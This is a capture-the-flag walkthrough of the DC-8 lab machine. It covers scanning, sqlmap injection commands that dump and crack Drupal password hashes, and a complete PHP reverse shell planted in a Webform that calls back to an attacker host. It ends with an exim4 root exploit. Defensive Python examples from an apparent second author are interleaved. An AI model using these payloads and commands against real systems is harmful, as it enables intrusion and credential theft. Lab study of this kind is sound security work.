DC-8


author:leadlife

date:2023/5/18

blog:https://tripse.github.io/

Tools used in this test:

  • Information gathering: nmap, fscan, cmseek, searchsploit
  • Getting a SHELL: none
  • Exploitation: SQLmap
  • Brute force: hashid, hashcat
  • FUZZ: none
  • Auxiliary tools: none
  • Privilege escalation: none

External information gathering

Nmap ICMP scan to discover hosts

The target IP for this box is 10.10.10.138

sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:09 CST
Nmap scan report for 10.10.10.138
Host is up (0.00020s latency).
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:EF:7D:81 (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds

fscan scan for open ports

sudo fscan -h 10.10.10.138 -p 0-65535 -t 30

fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.138 is alive
[*] Icmp alive hosts len is: 1
10.10.10.138:22 open
10.10.10.138:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://10.10.10.138 code:200 len:7924 title:Welcome to DC-8 | DC-8
已完成 2/2
[*] 扫描结束,耗时: 5.851445651s

Detailed Nmap port scan

sudo nmap -sS -sV -sC -O -T4 --min-rate 10000 -oN nmap.all 10.10.10.138 -p22,80

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:10 CST
Nmap scan report for 10.10.10.138
Host is up (0.00027s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
| 256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_ 256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open http Apache httpd
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds

Identifying the CMS

Visiting the web page shows that it is Drupal.

CMSeek to determine the CMS version

searchsploit to look up exploits for this CMS version

Drupal 7 has both RCE and SQL injection entries.

Getting a SHELL

Trying the exploits

All of them fail; I suspect the author made some modifications, though it may also be the environment, so I move on to manual testing.

SQL injection to obtain the hashes

http://10.10.10.138/?nid=1

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment

Enumerate databases:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment --dbs

Enumerate tables:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db --tables

+-----------------------------+
| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+

Enumerate the columns of users:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users --columns

Dump the account names and password hashes:

sqlmap -u "http://10.10.10.138/?nid=1" --risk 3 --threads 10 --tamper=space2comment -D d7db -T users -C "name,pass" --dump

Database: d7db
Table: users
[2 entries]
+--------+---------------------------------------------------------+
| name | pass |
+--------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+
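The `?nid=1` parameter above is injectable because the node id reaches the query as SQL text rather than as a bound value. The Python below is an added example (mine, not the writeup's and not Drupal's own code; DC-8's actual query is not shown on the page) that puts the vulnerable pattern beside the parameterized and type-validated forms, using an in-memory SQLite table with constructed rows in place of the MySQL `node` and `users` tables. It shows why sqlmap's tautology and UNION payloads work against the first and are inert against the other two.

```python
import sqlite3

# Constructed rows standing in for the node and users tables (not DC-8's real data).
SAMPLE_NODES = [(1, "Welcome to DC-8"), (2, "Contact Us"), (3, "Internal notes")]
SAMPLE_USERS = [("admin", "CONSTRUCTED-HASH-ADMIN"), ("john", "CONSTRUCTED-HASH-JOHN")]


def make_db():
    """In-memory SQLite database shaped like a minimal Drupal node/users pair."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE node (nid INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO node VALUES (?, ?)", SAMPLE_NODES)
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, nid_param):
    """Concatenation: whatever arrives in ?nid= is parsed as part of the SQL statement."""
    sql = "SELECT title FROM node WHERE nid = " + nid_param
    return sorted(row[0] for row in conn.execute(sql))


def lookup_parameterized(conn, nid_param):
    """Bound parameter: the value is data, never SQL, so tautologies and UNIONs match nothing."""
    rows = conn.execute("SELECT title FROM node WHERE nid = ?", (nid_param,))
    return sorted(row[0] for row in rows)


def lookup_validated(conn, nid_param):
    """Defence in depth: refuse anything that is not an integer before it reaches the database."""
    try:
        nid = int(nid_param, 10)
    except ValueError:
        return []
    return lookup_parameterized(conn, nid)


if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "1 OR 1=1", "0 UNION SELECT pass FROM users"):
        print(repr(payload))
        print("  concatenated :", lookup_vulnerable(db, payload))
        print("  parameterized:", lookup_parameterized(db, payload))
        print("  validated    :", lookup_validated(db, payload))
```

The `--tamper=space2comment` option used above only matters against a filter that blocks spaces; no tamper script helps once the id is bound as a parameter, and the integer check additionally rejects the request before the database sees it.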

Identifying the hash

Cracking the hash offline

I tried online cracking sites without success, so I crack it offline. First use hashid to get the hashcat mode number:

leadlife@endeavrouOS /o/s/tamper> hashid -m
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
Analyzing '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
[+] Drupal > v7.x [Hashcat Mode: 7900]

hashcat -a 0 -m 7900 hash.txt /usr/share/seclists/Passwords/probable-v2-top12000.txt

This yields john's password:

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF:turtle
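hashid's "Drupal > v7.x" verdict, and the reason mode 7900 is slow, can both be read straight out of the hash string: `$S$` selects sha512, the fourth character encodes the iteration count, and the next eight characters are the salt. The Python below is an added example (mine, not the writeup's; it ports the public algorithm from Drupal 7's password.inc but is not Drupal's code) that parses those fields, recomputes the hash exactly as the application does on login, and runs a defender-side audit that flags stored hashes with a cost below the Drupal 7 default. The hash is john's from the dump above; the low-cost hash in the audit and the threshold of 2^15 are assumptions for the example.

```python
import hashlib
import hmac

# Alphabet Drupal 7 (and phpass) uses for the cost character and its custom base64 output.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are truncated to 55 characters
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
DEFAULT_LOG2 = 15           # DRUPAL_HASH_COUNT: the cost Drupal 7 hashes with by default

# john's hash from the sqlmap dump: "$S$" + cost char + 8-char salt + truncated digest.
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"


def parse_setting(stored):
    """Split a phpass-style hash into algorithm letter, cost (log2 of iterations) and salt."""
    if len(stored) < 12 or stored[0] != "$" or stored[2] != "$":
        raise ValueError("not a phpass-style hash")
    count_log2 = ITOA64.find(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("cost character outside the accepted range")
    return {"algo": stored[1], "count_log2": count_log2,
            "iterations": 1 << count_log2, "salt": stored[4:12]}


def _password_base64(data):
    """Port of Drupal's _password_base64_encode(): 3 bytes -> 4 chars, low bits first."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(password, stored):
    """Port of _password_crypt(): rehash `password` under the setting carried in `stored`.

    "$S$" hashes use sha512; "$P$"/"$H$" are phpass md5 imports. The first digest covers
    salt+password, then the digest+password chain runs 2**cost more times.
    """
    setting = stored[:12]
    s = parse_setting(setting)
    algo = {"S": "sha512", "P": "md5", "H": "md5"}[s["algo"]]
    pw = password.encode()
    digest = hashlib.new(algo, s["salt"].encode() + pw).digest()
    for _ in range(s["iterations"]):
        digest = hashlib.new(algo, digest + pw).digest()
    return (setting + _password_base64(digest))[:HASH_LENGTH]


def verify(password, stored):
    """What user_check_password() does on login: recompute and compare in constant time."""
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)


def audit_cost(hashes, min_log2=DEFAULT_LOG2):
    """Defender check over a users.pass column: hashes whose cost is below the expected minimum."""
    return [h for h in hashes if parse_setting(h)["count_log2"] < min_log2]


if __name__ == "__main__":
    info = parse_setting(JOHN_HASH)
    print("cost 2^%d = %d iterations, salt %s" % (info["count_log2"], info["iterations"], info["salt"]))
    print("turtle verifies:", verify("turtle", JOHN_HASH))
```

The 2^15 = 32768 chained sha512 calls per guess are what hashcat has to repeat for every wordlist entry; a weak password such as `turtle` still falls quickly, so the cost factor buys time but does not replace password policy. The audit function is the check to run against a `users.pass` export after an upgrade or import, since hashes carried over from other systems keep whatever cost they were created with.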

GetSHELL from the admin backend

Log in to the backend: http://10.10.10.138/user/

Click Contact Us:

Then click Webform; PHP code can be added directly here to get a shell.

Edit the content to be php-reverse-shell:

<p>Thanks for taking the time to contact us. We shall be in contact soon.</p>
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon; // the flag is set at file scope; without this the function never sees it
    if (!$daemon) {
        print "$string\n";
    }
}

?>

Switch the text format to PHP code and save. Start a local listener:

nc -lvnp 1234

Submit the form with any content and the reverse SHELL comes back.

Upgrading the SHELL

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$ export TERM=xterm

Internal information gathering

Kernel and distribution

SUID

exim4

SUDO

no sudo
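The SUID step above is the classic `find / -perm -4000` sweep that turned up exim4. As an added example (mine, not the author's), here is the same enumeration as a defender would schedule it: walk the filesystem for setuid/setgid regular files and report anything not on an allowlist, which is how an unexpected setuid mail binary gets noticed before someone else finds it. The allowlist and the temporary directory tree containing a fake `exim4` are constructed for the example.

```python
import os
import stat
import tempfile

# Constructed allowlist: setuid programs a stock Debian host is expected to carry.
EXPECTED_SUID = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn", "newgrp", "gpasswd"}


def find_setuid(root):
    """Return root-relative paths of regular files under `root` with the setuid or setgid bit set.

    Equivalent to `find root -type f -perm /6000`; lstat is used so symlinks are not followed.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # raced deletion or unreadable entry: skip it, do not abort the sweep
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(os.path.relpath(path, root))
    return sorted(found)


def unexpected_setuid(root, expected=EXPECTED_SUID):
    """Setuid files whose basename is not on the allowlist; on DC-8, exim4 would land here."""
    return [p for p in find_setuid(root) if os.path.basename(p) not in expected]


def build_demo_tree():
    """Constructed fragment: one expected setuid binary, one unexpected one, one plain file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    for rel, mode in (("usr/bin/passwd", 0o4755), ("usr/sbin/exim4", 0o4755), ("usr/bin/ls", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # placeholder content; only the mode bits matter here
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    print("setuid/setgid files:", find_setuid(demo))
    print("not on allowlist   :", unexpected_setuid(demo))
```

Run against `/` on a real host the allowlist needs to be built from a known-good image of the same distribution, and any new entry (or a known entry whose version has a published fix, as with Exim 4.89 here) is the finding to act on.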

Privilege escalation

Privilege escalation via SUID exim4

Transfer the exploit over with Python, then run it:

www-data@dc-8:/tmp$ bash 46996.sh -m netcat
bash 46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Thu, 18 May 2023 23:22:48 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1pzdai-0004rL-Bo
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# cd /root
root@dc-8:/root# ls
flag.txt
root@dc-8:/root# cat flag.txt


Brilliant - you have succeeded!!!



888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888



Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.